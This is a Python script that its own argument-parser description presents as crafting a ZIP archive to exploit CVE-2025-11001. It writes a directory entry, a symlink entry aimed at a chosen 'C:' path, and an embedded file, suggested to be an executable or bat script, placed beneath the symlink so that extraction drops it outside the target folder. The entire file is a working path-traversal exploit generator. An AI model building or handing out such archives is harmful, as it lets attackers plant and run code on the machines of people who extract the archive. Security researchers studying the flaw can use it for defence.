import argparseimport osimport timeimport zipfile
def add_dir(z, arcname):
    """Write an explicit, empty directory entry named *arcname* into ZipFile *z*.

    A trailing ``/`` is appended when missing so readers classify the entry
    as a directory. The entry is stored uncompressed with no body.

    Args:
        z: An open ``zipfile.ZipFile`` in write/append mode.
        arcname: Directory path inside the archive.
    """
    entry_name = arcname if arcname.endswith('/') else arcname + '/'
    # Stamp the header with the current local time (seconds resolution is enough for ZIP).
    info = zipfile.ZipInfo(entry_name, date_time=time.localtime()[:6])
    info.create_system = 3  # "version made by" host: 3 == Unix
    # High 16 bits carry the Unix mode (S_IFDIR | 0755); 0x10 is the MS-DOS directory flag.
    info.external_attr = (0o040755 << 16) | 0x10
    info.compress_type = zipfile.ZIP_STORED
    z.writestr(info, b'')
def add_symlink(z, arcname, target):
    """Write a symbolic-link entry *arcname* into ZipFile *z* that points at *target*.

    ZIP has no dedicated link record: the entry is a stored file whose body is
    the UTF-8 target path and whose Unix mode (S_IFLNK | 0777, kept in the high
    16 bits of ``external_attr``) tells a Unix-aware extractor to treat it as a
    link. Archive scanners can recognise such entries by those mode bits, and a
    safe extractor refuses or neutralises link entries whose target would leave
    the extraction directory.

    Args:
        z: An open ``zipfile.ZipFile`` in write/append mode.
        arcname: Path of the link inside the archive.
        target: Path the link points to; written verbatim (UTF-8) as the entry body.
    """
    info = zipfile.ZipInfo(arcname, date_time=time.localtime()[:6])
    info.create_system = 3  # "version made by" host: 3 == Unix
    info.external_attr = 0o120777 << 16  # Unix mode S_IFLNK | 0777 in the high 16 bits
    info.compress_type = zipfile.ZIP_STORED
    z.writestr(info, target.encode('utf-8'))
def add_file_from_disk(z, arcname, src_path):
    """Copy the local file *src_path* into ZipFile *z* under archive path *arcname*.

    The file is read fully into memory and stored uncompressed as a regular
    Unix file (mode 0644). *arcname* is used as given; no check is made that it
    stays inside the archive's own tree.

    Args:
        z: An open ``zipfile.ZipFile`` in write/append mode.
        arcname: Path of the entry inside the archive.
        src_path: Local path of the file whose bytes become the entry body.
    """
    with open(src_path, 'rb') as handle:
        body = handle.read()
    info = zipfile.ZipInfo(arcname, date_time=time.localtime()[:6])
    info.create_system = 3  # "version made by" host: 3 == Unix
    info.external_attr = 0o100644 << 16  # Unix mode S_IFREG | 0644 in the high 16 bits
    info.compress_type = zipfile.ZIP_STORED
    z.writestr(info, body)
def main():
    """Parse the command line and write the archive described by the arguments.

    The archive holds three stored entries, in this order: a top-level
    directory, a symlink entry beneath it, and the embedded local file placed
    at a path that runs through the symlink entry. The output path is printed
    once the archive is closed.
    """
    parser = argparse.ArgumentParser(
        description="Crafts a zip that exploits CVE-2025-11001."
    )
    # Registered in the original order so the generated --help text is unchanged.
    option_specs = (
        (("--zip-out", "-o"),
         {"required": True, "help": "Path to the output ZIP file."}),
        (("--symlink-target", "-t"),
         {"required": True,
          "help": "Destination path the symlink points to - specify a \"C:\" path"}),
        (("--data-file", "-f"),
         {"required": True,
          "help": "Path to the local file to embed e.g an executable or bat script."}),
        (("--dir-name",),
         {"default": "data",
          "help": "Top-level directory name inside the ZIP (default: data)."}),
        (("--link-name",),
         {"default": "link_in",
          "help": "Symlink entry name under the top directory (default: link_in)."}),
    )
    for flags, options in option_specs:
        parser.add_argument(*flags, **options)
    args = parser.parse_args()

    # Entry names: directory, link under it, and the file placed under the link name.
    top_dir = args.dir_name.rstrip("/")
    link_entry = "/".join((top_dir, args.link_name))
    file_entry = "/".join((link_entry, os.path.basename(args.data_file)))

    with zipfile.ZipFile(args.zip_out, "w") as archive:
        add_dir(archive, top_dir)
        add_symlink(archive, link_entry, args.symlink_target)
        add_file_from_disk(archive, file_entry, args.data_file)

    print(f"Wrote {args.zip_out}")
# Run the CLI only when executed as a script, not when the module is imported.
if __name__ == "__main__": main()